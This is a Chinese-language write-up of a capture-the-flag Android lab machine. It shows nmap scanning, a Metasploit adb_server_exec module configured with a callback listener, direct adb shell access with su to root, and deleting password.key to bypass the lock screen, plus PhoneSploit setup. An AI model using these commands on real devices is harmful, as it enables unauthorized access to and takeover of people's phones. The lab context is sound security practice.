nmap扫描存活主机和端口,发现开放了5555、8080、22000端口

访问8080端口如下:

Good Hackers ? means
we drop here our backdoor for access

If you r Smart Dan find Backdoor access...and safe your machine

we like POST things only.

扫目录发现.htaccessbackdoor.php,但是并没有啥用🥱

接着尝试一下其他办法(PHP CLIDropbear),搜索对应漏洞没有发现可利用的

然后来看5555端口即adb,可直接利用msf模块来打远程命令执行漏洞,但是它没有返回session也就没啥用了

use exploit/android/adb/adb_server_exec
set RHOSTS 192.168.150.157
set LHOST 192.168.150.128
set LPORT 3333

于是尝试直接adb成功连接拿到shell,su提权得到flag:ANDROID{u_GOT_root_buddy}

adb connect 192.168.150.157
adb devices
adb shell
adb shell screencap -p /sdcard/screen.png
adb pull /sdcard/screen.png

有了root权限后我们就可以直接绕过锁屏密码,在/data/system目录下有个password.key,直接将其删除即可无密码登录

再来试试Phonesploit,安装和使用命令如下:

apt install adb
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
python3 phonesploit.py

它也和adb一样能进行截图等操作

小记写在最后面:就是这么一个简单的靶机其实花了我很长时间,一开始如下图所示处于offline的状态😒设置了禁止远程adb?

然后nc上去随便发个包看看,啥也不是🥲G

后面重启了下adb然后重启kali,再重启靶机,不知道试了多少次才成功了~